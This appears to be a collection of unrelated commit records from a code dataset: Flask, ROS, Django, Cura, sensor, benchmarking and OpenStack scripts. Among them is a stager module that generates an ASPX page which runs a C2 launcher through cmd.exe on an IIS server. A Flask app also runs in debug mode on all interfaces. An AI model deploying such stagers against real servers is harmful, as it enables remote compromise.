c3[3] = "3456-7890"
c3[4] = "7654-3210"
sheet.set_column(c3[3], c3)
sheet.save()
def _random_binary(self):
with open('random_binary', 'wb') as fout:
fout.write(os.urandom(1024))
def test_01_open_csv(self):
# first try a valid csv
sheet = reapplication.open_csv("valid.csv")
assert sheet is not None
headers = sheet.headers()
assert headers == ["", "1234-5678", "2345-6789", "3456-7890"], headers
# now try one that won't parse
with self.assertRaises(reapplication.CsvValidationException):
sheet = reapplication.open_csv("random_binary")
def test_02_structure(self):
pass
def test_03_contents(self):
pass
| Python | 0 | |
df84cf964214420987c51813b8960ce068223adf | Add request handler | request_handler/request_handler.py | request_handler/request_handler.py | #!flask/bin/python
from flask import Flask, jsonify, abort
from flask import make_response
from flask import request
from flask import url_for
import psycopg2 as pg
app = Flask(__name__)
def make_public_request(request):
new_request = {}
new_request['uri'] = url_for('get_requests', request_id=request[0], _external=True)
new_request['source'] = request[1]
new_request['destination'] = request[2]
return new_request
@app.route('/clientapp/requests', methods=['GET'])
def get_requests():
''' Get requests from the database
'''
conn = pg.connect(database="ngot", host="127.0.0.1", port="5432")
cursor = conn.cursor()
cursor.execute("SELECT request_id, source, destination from requests")
rows = list(cursor.fetchall())
cursor.close()
conn.close()
return jsonify({'requests': [make_public_request(req) for req in rows]})
@app.route('/clientapp/vehicle_trips', methods=['GET'])
def get_vehicle_trips():
''' Query the database and return generated vehicle trips
'''
conn = pg.connect(database="ngot", host="127.0.0.1", port="5432")
cursor = conn.cursor()
pg.extensions.register_type(
pg.extensions.new_array_type(
(1017,), 'PICKUP_POINTS[]', pg.STRING))
cursor.execute("SELECT pickup_points from vehicletrips")
rows = cursor.fetchone()
cursor.close()
conn.close()
return jsonify({'vehicle_trips': rows})
@app.route('/clientapp/requests', methods=['POST'])
def create_request():
#if not request.json in request.json:
#abort(404)
conn = pg.connect(database="ngot", host="127.0.0.1", port="5432")
cursor = conn.cursor()
#request_id = request.json['request_id']
source = request.json['source']
destination = request.json['destination']
cursor.execute("INSERT INTO requests (source, destination) values (%s, %s)", (source, destination))
rows = cursor.rowcount
conn.commit()
cursor.close()
conn.close()
return jsonify({'rows': rows}), 201
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
#app.run(debug=True)
| Python | 0.000001 | |
4e54128e5c0b9c762e5f93ae0d8791eeddde2264 | Add JSON serializer | dxr/json.py | dxr/json.py | #!/usr/bin/env python2
class JsonOutput:
need_separator = False
content = ''
def open(self):
self.content += '{'
self.need_separator = False
def close(self):
self.content += '}'
self.need_separator = True
def open_list(self):
self.content += '['
self.need_separator = False
def close_list(self):
self.content += ']'
self.need_separator = True
def key_value(self, key, value, quote_value):
if self.need_separator is True:
self.content += ','
if key is not None:
self.content += '"' + key + '"'
self.content += ' : '
if quote_value is True:
self.content += '"' + value + '"'
else:
self.content += value
self.need_separator = True
def key_dict(self, key, nested_values):
if self.need_separator is True:
self.content += ','
if key is not None:
self.content += '"' + key + '"'
self.content += ' : '
self.open()
for subkey in nested_values.keys():
self.add(subkey, nested_values[subkey])
self.close()
self.need_separator = True
def key_list(self, key, values):
if self.need_separator is True:
self.content += ','
self.content += '"' + key + '"'
self.content += ' : '
self.open_list()
for subvalue in values:
self.add(None, subvalue)
self.close_list()
self.need_separator = True
def add(self, key, value):
if isinstance(value, dict):
self.key_dict(key, value)
elif isinstance(value, list):
self.key_list(key, value)
elif isinstance(value, int):
self.key_value(key, str(value), False)
else:
self.key_value(key, str(value), True)
def print_str(self):
return '{' + self.content + '}'
#if __name__ == '__main__':
# json = JsonOutput()
#
# json.add('foo', 'bar')
# json.add('age', 666)
# json.add('hash', { 'aa': 'bb', 'cc': 'dd', 'zz': [ 1, 3, 5]})
# json.add('list', [1, 2, 3])
# json.add('mixed', [ {'Foo': 'bar', 'Tu': 'ruru' }, { 'lala': 'whee', 'pi': 3 } ])
#
# print json.print_str();
| Python | 0 | |
30eec7bb18285b82a7d67a0a3d9098afc5b9e286 | Create QRfactorization.py | effective_quadratures/QRfactorization.py | effective_quadratures/QRfactorization.py | # A set of functions just for QR factorization, pivoting and iterative-QR
| Python | 0.000001 | |
324243dfd61afd8ce244a9a02ffc800c5c73ce55 | Add modified chart with better values | charts/daniels_designing_great_beers/appendix_two_course_grind_potential_extract_modified.py | charts/daniels_designing_great_beers/appendix_two_course_grind_potential_extract_modified.py |
from brew.utilities import sg_from_dry_basis
"""
Ray Daniels
Designing Great Beers
Appendix 2: Course Grind Potential Extract (modified)
Notes:
The chart appears to have been developed with the moisture content set
to zero (0.0) and the Brew House Efficiency set to 100% (1.0). This
is not typical and the book even states that you should expect moisture
content at around 4.0% and Brew House Efficiency at arount 90.0%.
This version has been modified with more typical values.
"""
def get_chart():
mc = 4
bhe = 0.9
chart = []
for dbcg in range(5000, 7600, 100) + range(7600, 8025, 25):
gu = sg_from_dry_basis(
dbcg / 100.0,
moisture_content=mc,
brew_house_efficiency=bhe)
sg = 1 + (gu / 1000.0)
chart.append([round(dbcg / 100.0, 2), round(gu, 2), round(sg, 4)])
return chart
def print_chart():
chart = get_chart()
print("DBCG\tGU\t1 lb./gallon")
print("'As-Is'\t\tYields SG")
print("-------\t-----\t------------")
for dbcg, gu, sg in chart:
print("{0:0.2f}\t{1:0.2f}\t{2:0.4f}".format(dbcg, gu, sg))
def main():
print_chart()
if __name__ == "__main__":
main()
| Python | 0 | |
7172d06ced60b2c69b9ac2762019ff95f3fd7da5 | Create twice.py | twice.py | twice.py | #!/usr/bin/env python
import rospy
from std_msgs.msg import Int32
n = 0
def cb(message):
//rospy.loginfo(message.data*2)
global n
n = message.data*2
if __name__ == '__main__':
rospy.init_node('twice')
sub = rospy.Subscriber('count_up', Int32, cb)
//rospy.spin()
pub = rospy.Publisher('twice', Int32, queue_size=1)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
pub.publish(n)
rate.sleep()
| Python | 0.000002 | |
a882409ede1898a3b4e2fb4619089b33c1427315 | Add migration | apps/conditions/migrations/0005_empty_relation.py | apps/conditions/migrations/0005_empty_relation.py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-08-10 14:23
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('conditions', '0004_condition_title'),
]
operations = [
migrations.AlterField(
model_name='condition',
name='relation',
field=models.CharField(choices=[('eq', 'is equal to (==)'), ('neq', 'is not equal to (!=)'), ('contains', 'contains'), ('gt', 'is greater than (>)'), ('gte', 'is greater than or equal (>=)'), ('lt', 'is lesser than (<)'), ('lte', 'is lesser than or equal (<=)'), ('empty', 'is empty'), ('notempty', 'is not empty')], max_length=8),
),
]
| Python | 0.000002 | |
673a6ee654d7e540fe9c473904b6d1e326928c58 | Create run_test.py | recipes/django-storages/run_test.py | recipes/django-storages/run_test.py | import django
from django.conf import settings
settings.configure(INSTALLED_APPS=['storages', 'django.contrib.contenttypes', 'django.contrib.auth'])
django.setup()
import storages
| Python | 0.000004 | |
87de57c86b5d607b1fa795b46cefb3a722919f72 | add script for testing speed | scripts/time_quimb.py | scripts/time_quimb.py | import timeit
# ----------------------------- dense dot ----------------------------------- #
setup = """
import quimb
a = quimb.rand_herm(2**4)
b = quimb.rand_herm(2**4)
"""
stmt = """
a @ b
"""
t = timeit.timeit(stmt, setup=setup, number=100000)
print("Small dot".ljust(20) + ": {:.3} sec".format(t))
setup = """
import quimb
a = quimb.rand_herm(2**10)
b = quimb.rand_herm(2**10)
"""
stmt = """
a @ b
"""
t = timeit.timeit(stmt, setup=setup, number=10)
print("Big dot".ljust(20) + ": {:.3} sec".format(t))
# ----------------------------- dense eigsys -------------------------------- #
setup = """
import quimb
mat = quimb.rand_herm(2**4) """
stmt = """
quimb.eigsys(mat) """
t = timeit.timeit(stmt, setup=setup, number=10000)
print("Small eigsys".ljust(20) + ": {:.3} sec".format(t))
setup = """
import quimb
mat = quimb.rand_herm(2**10) """
stmt = """
quimb.eigsys(mat) """
t = timeit.timeit(stmt, setup=setup, number=10)
print("Big eigsys".ljust(20) + ": {:.3} sec".format(t))
# ----------------------------- sparse eigsys ------------------------------- #
setup = """
import quimb
mat = quimb.rand_herm(2**14, sparse=True) """
stmt = """
quimb.seigsys(mat, backend='scipy') """
t = timeit.timeit(stmt, setup=setup, number=10)
print("Scipy seigsys".ljust(20) + ": {:.3} sec".format(t))
setup = """
import quimb
mat = quimb.rand_herm(2**14, sparse=True) """
stmt = """
quimb.seigsys(mat, backend='slepc') """
t = timeit.timeit(stmt, setup=setup, number=10)
print("Slepc seigsys".ljust(20) + ": {:.3} sec".format(t))
setup = """
import quimb
import qdmbl
mat = qdmbl.ham_qd(10, 1, sparse=True) """
stmt = """
quimb.seigsys(mat, sigma=0.01, backend='scipy') """
t = timeit.timeit(stmt, setup=setup, number=10)
print("Scipy seigsys int".ljust(20) + ": {:.3} sec".format(t))
setup = """
import quimb
import qdmbl
mat = qdmbl.ham_qd(10, 1, sparse=True) """
stmt = """
quimb.seigsys(mat, sigma=1, backend='slepc') """
t = timeit.timeit(stmt, setup=setup, number=10)
print("Slepc seigsys int".ljust(20) + ": {:.3} sec".format(t))
| Python | 0 | |
397bc67a5a214a4cad5eef20f3a13c53f90964c5 | Modify tms_nw_svr | scripts/tms_nw_svr.py | scripts/tms_nw_svr.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import rospy
import requests
from BaseHTTPServer import HTTPServer
from BaseHTTPServer import BaseHTTPRequestHandler
import urlparse
def svr_start(port, callback):
def handler(*args):
CallbackServer(callback, *args)
server = HTTPServer(('', int(port)), handler)
server.serve_forever()
class tms_nw_svr(BaseHTTPRequestHandler):
def __init__(self, callback, *args):
self.callback = callback
BaseHTTPRequestHandler.__init__(self, args)
def do_GET(self):
parsed_path = urlparse.urlparse(self.path)
query = parsed_path.query
self.send_response(200)
self.end_headers()
result = self.callback(query)
message = '\r\n'.join(result)
self.wfile.write(message)
return | Python | 0 | |
fec45cfaee6c5e5d02b6c3979179cdad153d5076 | add ds18b20 rpi implementation to examples | examples/raspberrypi/platform/ds18b20.py | examples/raspberrypi/platform/ds18b20.py | import os
import re
import subprocess
W1_DEVICES = '/sys/bus/w1/devices/'
W1_SENSOR_PATTERN = re.compile('(10|22|28)-.+', re.IGNORECASE)
def modprobe(module):
return subprocess.check_call(['modprobe', module])
def init_w1():
modprobe('w1-gpio')
modprobe('w1-therm')
def is_w1_sensor(path):
return \
W1_SENSOR_PATTERN.match(path) and \
os.path.isfile(sensor_full_path(path))
def sensor_full_path(sensor):
return os.path.join(W1_DEVICES, sensor, 'w1_slave')
def read_whole_file(path):
with open(path, 'r') as f:
return f.read()
class InvalidW1Address(Exception):
def __init__(self, address):
super(InvalidW1Address, self).__init__()
self.address = address
def guard_against_invalid_address(address):
if not W1_SENSOR_PATTERN.match(address):
raise InvalidW1Address(address)
class DS18b20(object):
@staticmethod
def find_all():
return [DS18b20(x) for x in os.listdir(W1_DEVICES) if is_w1_sensor(x)]
def __init__(self, address):
guard_against_invalid_address(address)
self.address = address
def read(self):
readings = read_whole_file(sensor_full_path(self.address))
temp_token = 't='
temp_index = readings.find(temp_token)
if temp_index < 0:
return None
temp = readings[temp_index + len(temp_token):]
return float(temp) / 1000
| Python | 0 | |
ba3643f6e2adc0c5c32134b5ec23403e97663237 | Create vFMCT.py | vFMCT.py | vFMCT.py | # -*- coding: utf-8 -*-
"""
@author: Jean-Gabriel JOLLY
"""
from tkinter import *
import PIL
from PIL import Image
import os
global rectangleList
rectangleList=[]
global numberImage, numberRectangle,totalRectangle
numberImage, numberRectangle,totalRectangle = 0,0,0
#Square position
global x1,x2,y1,y2
x1,x2,y1,y2=0,0,0,0
#===============
def leftClick(event):
chaine.configure(text = str(event.x)+" "+str(event.y))
global x1,y1
x1=event.x
y1=event.y
def holdLeftClick(event):
global numberRectangle
chaine.configure(text = str(event.x)+" "+str(event.y)+"Frame object number "+str(numberRectangle))
cadre.coords(rectangle, x1,y1,event.x,event.y)
def releaseLeftClick(event):
cadre.coords(rectangle, 0, 0, 0, 0)
global x2,y2,numberRectangle,rectangleList,totalRectangle
chaine.configure(text = "Number of frames:" + str(numberRectangle+1))
x2=event.x
y2=event.y
rectangleList.append(cadre.create_rectangle(x1,y1,x2,y2))
numberRectangle += 1
totalRectangle += 1
####CROPPING PART#####
area = (x1/hpercent, y1/hpercent, x2/hpercent, y2/hpercent)
cropped_img = img.crop(area)
cropped_img.save('name' + str(totalRectangle) + '.png')
######################
def middleClick(event):
global numberRectangle
numberRectangle += 1
id1=cadre.create_rectangle(10,10,12,12)
cadre.delete(id1)
def rightClick(event):
global rectangleList, numberRectangle, totalRectangle
if numberRectangle > 0:
chaine.configure(text = "Erasing frame number ="+str(numberRectangle))
cadre.delete(rectangleList[len(rectangleList)-1])
del rectangleList[len(rectangleList)-1]
os.remove("name" + str(totalRectangle) + ".png")
numberRectangle -= 1
totalRectangle -= 1
else:
chaine.configure(text = "Nothing to erase")
fen = Tk()
fen.title('Very Fast Multiple Cropping Tool')
height=fen.winfo_screenwidth() #^\/
width=fen.winfo_screenheight() #<>
photo = PhotoImage(file="image3.png")
###DISPLAY RESIZE MODULE###
baseheight = (fen.winfo_screenwidth()-1000) #size of the height of the screen
img = Image.open("image3.png")
hpercent = ((baseheight / float(img.size[1])))
print(hpercent)
wsize = int((float(img.size[0]) * float(hpercent)))
img2 = img.resize((wsize, baseheight), PIL.Image.ANTIALIAS)
###########################
img2.save("temporaryFile.png")
#photo2 = PhotoImage(file="image32bis.png")
photo2 = PhotoImage(file="temporaryFile.png")
cadre = Canvas(fen, width=photo2.width(), height=photo2.height(), bg="light yellow")
cadre.create_image(0, 0, anchor=NW, image=photo2) #BUG
cadre.bind("<Button-1>", leftClick)
cadre.bind("<B1-Motion>", holdLeftClick)
cadre.bind("<ButtonRelease-1>", releaseLeftClick)
cadre.bind("<Button-2>", middleClick)
cadre.bind("<ButtonRelease-3> ", rightClick)
cadre.pack()
chaine = Label(fen)
chaine.pack()
rectangle=cadre.create_rectangle(0,0,0,0)
fen.mainloop()
os.remove("temporaryFile.png")
print(numberImage)
print(numberRectangle)
print(rectangleList)
print(height)
print(width)
| Python | 0 | |
053974bc96ef34075612495a7eb537ff691ff38e | Add test to see if legacy files are renamed | tests/Settings/TestCuraContainerRegistry.py | tests/Settings/TestCuraContainerRegistry.py | # Copyright (c) 2017 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
import os #To find the directory with test files and find the test files.
import pytest #This module contains unit tests.
import shutil #To copy files to make a temporary file.
import unittest.mock #To mock and monkeypatch stuff.
from cura.Settings.CuraContainerRegistry import CuraContainerRegistry #The class we're testing.
from cura.Settings.ExtruderStack import ExtruderStack #Testing for returning the correct types of stacks.
from cura.Settings.GlobalStack import GlobalStack #Testing for returning the correct types of stacks.
from UM.Resources import Resources #Mocking some functions of this.
import UM.Settings.ContainerRegistry #Making empty container stacks.
import UM.Settings.ContainerStack #Setting the container registry here properly.
from UM.Settings.DefinitionContainer import DefinitionContainer #Checking against the DefinitionContainer class.
## Gives a fresh CuraContainerRegistry instance.
@pytest.fixture()
def container_registry():
return CuraContainerRegistry()
## Tests whether loading gives objects of the correct type.
@pytest.mark.parametrize("filename, output_class", [
("ExtruderLegacy.stack.cfg", ExtruderStack),
("MachineLegacy.stack.cfg", GlobalStack),
("Left.extruder.cfg", ExtruderStack),
("Global.global.cfg", GlobalStack),
("Global.stack.cfg", GlobalStack)
])
def test_loadTypes(filename, output_class, container_registry):
#Mock some dependencies.
UM.Settings.ContainerStack.setContainerRegistry(container_registry)
Resources.getAllResourcesOfType = unittest.mock.MagicMock(return_value = [os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", filename)]) #Return just this tested file.
def findContainers(id, container_type = 0):
if id == "some_instance" or id == "some_definition":
return [UM.Settings.ContainerRegistry._EmptyInstanceContainer(id)]
else:
return []
container_registry.findContainers = findContainers
with unittest.mock.patch("cura.Settings.GlobalStack.GlobalStack.findContainer"):
with unittest.mock.patch("os.remove"):
container_registry.load()
#Check whether the resulting type was correct.
stack_id = filename.split(".")[0]
for container in container_registry._containers: #Stupid ContainerRegistry class doesn't expose any way of getting at this except by prodding the privates.
if container.getId() == stack_id: #This is the one we're testing.
assert type(container) == output_class
break
else:
assert False #Container stack with specified ID was not loaded.
## Tests whether loading a legacy file moves the upgraded file properly.
def test_loadLegacyFileRenamed(container_registry):
#Create a temporary file for the registry to load.
temp_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", "temporary.stack.cfg")
temp_file_source = os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", "MachineLegacy.stack.cfg")
shutil.copyfile(temp_file_source, temp_file)
#Mock some dependencies.
UM.Settings.ContainerStack.setContainerRegistry(container_registry)
Resources.getAllResourcesOfType = unittest.mock.MagicMock(return_value = [temp_file]) #Return a temporary file that we'll make for this test.
def findContainers(id, container_type = 0):
return [UM.Settings.ContainerRegistry._EmptyInstanceContainer(id)]
container_registry.findContainers = findContainers
with unittest.mock.patch("cura.Settings.GlobalStack.GlobalStack.findContainer"):
container_registry.load()
assert not os.path.isfile(temp_file)
new_filename = os.path.splitext(os.path.splitext(temp_file)[0])[0] + ".global.cfg"
assert os.path.isfile(new_filename) | # Copyright (c) 2017 Ultimaker B.V.
# Cura is released under the terms of the AGPLv3 or higher.
import os #To find the directory with test files and find the test files.
import pytest #This module contains unit tests.
import unittest.mock #To mock and monkeypatch stuff.
from cura.Settings.CuraContainerRegistry import CuraContainerRegistry #The class we're testing.
from cura.Settings.ExtruderStack import ExtruderStack #Testing for returning the correct types of stacks.
from cura.Settings.GlobalStack import GlobalStack #Testing for returning the correct types of stacks.
from UM.Resources import Resources #Mocking some functions of this.
import UM.Settings.ContainerRegistry #Making empty container stacks.
import UM.Settings.ContainerStack #Setting the container registry here properly.
from UM.Settings.DefinitionContainer import DefinitionContainer #Checking against the DefinitionContainer class.
## Gives a fresh CuraContainerRegistry instance.
@pytest.fixture()
def container_registry():
return CuraContainerRegistry()
## Tests whether loading gives objects of the correct type.
@pytest.mark.parametrize("filename, output_class", [
("ExtruderLegacy.stack.cfg", ExtruderStack),
("MachineLegacy.stack.cfg", GlobalStack),
("Left.extruder.cfg", ExtruderStack),
("Global.global.cfg", GlobalStack),
("Global.stack.cfg", GlobalStack)
])
def test_loadTypes(filename, output_class, container_registry):
#Mock some dependencies.
UM.Settings.ContainerStack.setContainerRegistry(container_registry)
Resources.getAllResourcesOfType = unittest.mock.MagicMock(return_value = [os.path.join(os.path.dirname(os.path.abspath(__file__)), "stacks", filename)]) #Return just this tested file.
def findContainers(id, container_type = 0):
if id == "some_instance" or id == "some_definition":
return [UM.Settings.ContainerRegistry._EmptyInstanceContainer(id)]
else:
return []
container_registry.findContainers = findContainers
with unittest.mock.patch("cura.Settings.GlobalStack.GlobalStack.findContainer"):
with unittest.mock.patch("os.remove"):
container_registry.load()
#Check whether the resulting type was correct.
stack_id = filename.split(".")[0]
for container in container_registry._containers: #Stupid ContainerRegistry class doesn't expose any way of getting at this except by prodding the privates.
if container.getId() == stack_id: #This is the one we're testing.
assert type(container) == output_class
break
else:
assert False #Container stack with specified ID was not loaded. | Python | 0 |
32ea42bcbc557e82e61797daf3643dc4a37d0f4c | add new stager .aspx | lib/stagers/windows/aspx.py | lib/stagers/windows/aspx.py | from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Aspx',
'Author': ['Luis Vacas @CyberVaca'],
'Description': ('Generates an aspx file'),
'Comments': [
'Simply launch launcher.aspx from iis '
]
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener': {
'Description': 'Listener to generate stager for.',
'Required': True,
'Value': ''
},
'Language' : {
'Description' : 'Language of the stager to generate.',
'Required' : True,
'Value' : 'powershell'
},
'StagerRetries': {
'Description': 'Times for the stager to retry connecting.',
'Required': False,
'Value': '0'
},
'Base64' : {
'Description' : 'Switch. Base64 encode the output.',
'Required' : True,
'Value' : 'True'
},
'OutFile': {
'Description': 'File to output SCT to, otherwise displayed on the screen.',
'Required': False,
'Value': '/tmp/launcher.aspx'
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
# extract all of our options
language = self.options['Language']['Value']
listenerName = self.options['Listener']['Value']
base64 = self.options['Base64']['Value']
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
stagerRetries = self.options['StagerRetries']['Value']
encode = False
if base64.lower() == "true":
encode = True
# generate the launcher code
launcher = self.mainMenu.stagers.generate_launcher(
listenerName, language=language, encode=encode, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
if launcher == "":
print helpers.color("[!] Error in launcher command generation.")
return ""
else:
code = "<%@ Page Language=\"C#\" Debug=\"true\" Trace=\"false\" %>\n"
code += "<%@ Import Namespace=\"System.Diagnostics\" %>\n"
code += "<%@ Import Namespace=\"System.IO\" %>\n"
code += "<script Language=\"c#\" runat=\"server\">\n"
code += "void Page_Load(object sender, EventArgs e)\n"
code += "{\n"
code += "ProcessStartInfo psi = new ProcessStartInfo();\n"
code += "psi.FileName = \"cmd.exe\";\n"
code += "psi.Arguments = \"/c " + launcher + "\";\n"
code += "psi.RedirectStandardOutput = true;\n"
code += "psi.UseShellExecute = false;\n"
code += "Process p = Process.Start(psi);\n"
code += "}\n"
code += "</script>\n"
code += "<HTML>\n"
code += "<HEAD>\n"
code += "<title>Hackplayers Agent</title>\n"
code += "</HEAD>\n"
code += "<body >\n"
code += "</form>\n"
code += "</body>\n"
code += "</HTML>\n"
return code
| Python | 0 | |
01a659318644ef47cfe0c9ad3c484a974fb31e25 | Create __init__.py | __init__.py | __init__.py | Python | 0.000429 | ||
dead58329e0e04ae8535b097e688609b50ebfb76 | Add a script for interacting with hosts.conf files. | script/testMachines.py | script/testMachines.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import subprocess
import re
import requests
import json
import pyquery
import sys
def genHostsConf(fname, ips, numHostsPerMachine):
""" Take an old hosts file and a list of new machine ips
and generate a new hosts file with the new cluster
"""
fh = open(fname, 'r')
ret = {}
for line in fh.readlines():
line = line.strip()
if not line:
continue
if line.startswith('#'):
continue
try:
startHostId, startDnsPort, startHttpsPort, startHttpPort, startUdpPort,ip1, ip2, directory, note= re.split('\s+', line, 8)
break
except:
pass
hostCount = 0
for ip in ips:
dnsPort = int(startDnsPort)
httpsPort = int(startHttpsPort)
httpPort = int(startHttpPort)
udpPort = int(startUdpPort)
directory = 0
for diskId in xrange(numHostsPerMachine):
print "{0} {1} {2} {3} {4} {5} {6} /{7:02d}/gigablast/ note".format(hostCount, dnsPort, httpsPort, httpPort, udpPort, ip, ip, directory)
hostCount, dnsPort, httpsPort, httpPort, udpPort, directory = \
hostCount+ 1, dnsPort+ 1, httpsPort+ 1, httpPort+ 1, udpPort + 1, directory + 1
print "num-mirrors: 1"
return
def parseHostsConf(fname):
fh = open(fname, 'r')
ret = {}
for line in fh.readlines():
line = line.strip()
if not line:
continue
if line.startswith('#'):
continue
try:
hostId, dnsPort, httpsPort, httpPort, udbPort,ip1, ip2, directory, note= re.split('\s+', line, 8)
except:
continue
print directory, ip1, note
#try:
writeSpeed, readSpeed = testDiskSpeed(ip1, directory)
#except:
#writeSpeed, readSpeed = 0,0
note = note[1:]
group = re.split('\s+', note, 2)
ret[hostId] = {"writeSpeed":writeSpeed,
"readSpeed":readSpeed,
"disk":directory,
"ip":ip1,
"hostId":hostId,
"note":note,
"group":group[0] + ' ' + group[1]
}
# if note.find('novm'):
# ret[hostId]['vm'] = 0
# else:
# ret[hostId]['vm'] = 1
# if note.find('noht'):
# ret[hostId]['ht'] = 0
# else:
# ret[hostId]['ht'] = 1
print json.dumps(ret, indent=4)
return ret
# if __name__ == "__main__":
# parseHostsConf('../hosts.conf.cluster')
def getSplitTime():
hostsTable = 'http://207.241.225.222:8000/admin/hosts?c=ait&sort=13'
qq = requests.get(hostsTable)
d = pyquery.pyquery.PyQuery(qq.content)
cells = d('td')
for cell in cells.items():
print cell.text(), '***'
def testDiskSpeed(host, directory):
writeSpeedOut = subprocess.Popen('eval `ssh-agent`;ssh-add ~/.ssh/id_ecdsa; ssh {0} "cd {1};dd if=/dev/zero of=test bs=1048576 count=2048"'.format(host,directory),
stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=True).communicate()[1]
print 'matching **', writeSpeedOut, '**'
writeSpeed = re.match('.* (\d+\.*\d+) MB/s.*', writeSpeedOut, flags=re.DOTALL)
if writeSpeed:
writeSpeed = float(writeSpeed.group(1))
else:
writeSpeed = re.match('.* (\d+\.?\d+) GB/s.*', writeSpeedOut, flags=re.DOTALL)
if writeSpeed:
writeSpeed = float(writeSpeed.group(1)) * 1000
readSpeedOut = subprocess.Popen('eval `ssh-agent`;ssh-add ~/.ssh/id_ecdsa; ssh {0} "cd {1};dd if=test of=/dev/null bs=1048576"'.format(host,directory),
stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=True).communicate()[1]
readSpeed = re.match('.* (\d+\.?\d+) MB/s.*', readSpeedOut, flags=re.DOTALL)
if readSpeed:
float(readSpeed.group(1))
else:
readSpeed = re.match('.* (\d+\.*\d+) GB/s.*', readSpeedOut, flags=re.DOTALL)
if readSpeed:
readSpeed = float(readSpeed.group(1)) * 1000
return writeSpeed, readSpeed
def graphDiskSpeed(data):
reads = []
writes = []
readByGroup = {}
writeByGroup = {}
for hostId, stats in data.iteritems():
if stats['group'] not in readByGroup:
readByGroup[stats['group']] = []
readByGroup[stats['group']].append({'y':stats['readSpeed'], 'label':hostId})
if stats['group'] not in writeByGroup:
writeByGroup[stats['group']] = []
writeByGroup[stats['group']].append({'y':stats['writeSpeed'], 'label':hostId})
colors = ['#5996CE', '#385E82', "#CFB959", "#826838"]
for group, dataPoints in readByGroup.iteritems():
for xx in dataPoints:
xx['y'] = float(xx['y']) / 1000.0
color = colors.pop()
reads.append({
'type': "bar",
'showInLegend': True,
'name': group,
'color': color,
'dataPoints': dataPoints
})
writes.append({
'type': "bar",
'showInLegend': True,
'name': group,
'color': color,
'dataPoints': writeByGroup[group]
})
print json.dumps(reads)
print json.dumps(writes)
if __name__ == '__main__':
if len(sys.argv) > 0:
if sys.argv[1] == 'test':
parseHostsConf('../hosts.conf.cluster')
if sys.argv[1] == 'graph':
graphDiskSpeed(json.loads(open(sys.argv[2], 'r').read()))
if sys.argv[1] == 'newhosts':
genHostsConf('../hosts.conf.cluster', sys.argv[2:], 12)
#getSplitTime()
| Python | 0 | |
cb454d310431700e5ac9883a32f0b36e2e50e0fe | Add a check for keystone expired tokens buildup. | sensu/plugins/check-keystone-expired-tokens.py | sensu/plugins/check-keystone-expired-tokens.py | #!/opt/openstack/current/keystone/bin/python
#
# Copyright 2015, Jesse Keating <jlk@bluebox.net>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import sys
possible_topdir = os.path.normpath(os.path.join(os.path.abspath(sys.argv[0]),
os.pardir,
os.pardir))
if os.path.exists(os.path.join(possible_topdir,
'keystone',
'__init__.py')):
sys.path.insert(0, possible_topdir)
from keystone import cli
from keystone.common import environment
from keystone import token
from keystone.common import sql
from oslo.utils import timeutils
WATERMARK=1000
# Monkeypatch the sql Token class to add a method
from keystone.token.persistence.backends.sql import TokenModel
from keystone.token.persistence.backends.sql import Token
def monkeypatch_method(cls):
def decorator(func):
setattr(cls, func.__name__, func)
return func
return decorator
@monkeypatch_method(Token)
def list_tokens(self):
session = sql.get_session()
with session.begin():
now = timeutils.utcnow()
query = session.query(TokenModel)
query = query.filter(TokenModel.expires < now)
tokens = query.all()
if len(tokens) > WATERMARK:
print("Too many expired keystone tokens: %s" % len(tokens))
sys.exit(1)
# Create a class for listing the tokens and add it to the keystone-manage
# command list
class TokenList(cli.BaseApp):
"""List tokens in the DB"""
name = "token_list"
@classmethod
def main(cls):
token_manager = token.persistence.PersistenceManager()
token_manager.driver.list_tokens()
cli.CMDS.append(TokenList)
# Now do our thing
if __name__ == '__main__':
environment.use_stdlib()
dev_conf = os.path.join(possible_topdir,
'etc',
'keystone.conf')
config_files = None
if os.path.exists(dev_conf):
config_files = [dev_conf]
# keystone-manage wants a command as a argv, so give it token_list
sys.argv.append('token_list')
cli.main(argv=sys.argv, config_files=config_files)
| Python | 0 | |
ac40e54d22717fbf1a2444a67198cdba66506df8 | Add test for input setup workflow | cea/tests/test_inputs_setup_workflow.py | cea/tests/test_inputs_setup_workflow.py | import os
import unittest
import cea.config
from cea.utilities import create_polygon
from cea.datamanagement import zone_helper, surroundings_helper, terrain_helper, streets_helper, data_initializer, \
archetypes_mapper
# Zug site coordinates
POLYGON_COORDINATES = [(8.513465734818856, 47.178027239429234), (8.515472027162078, 47.177895971877604),
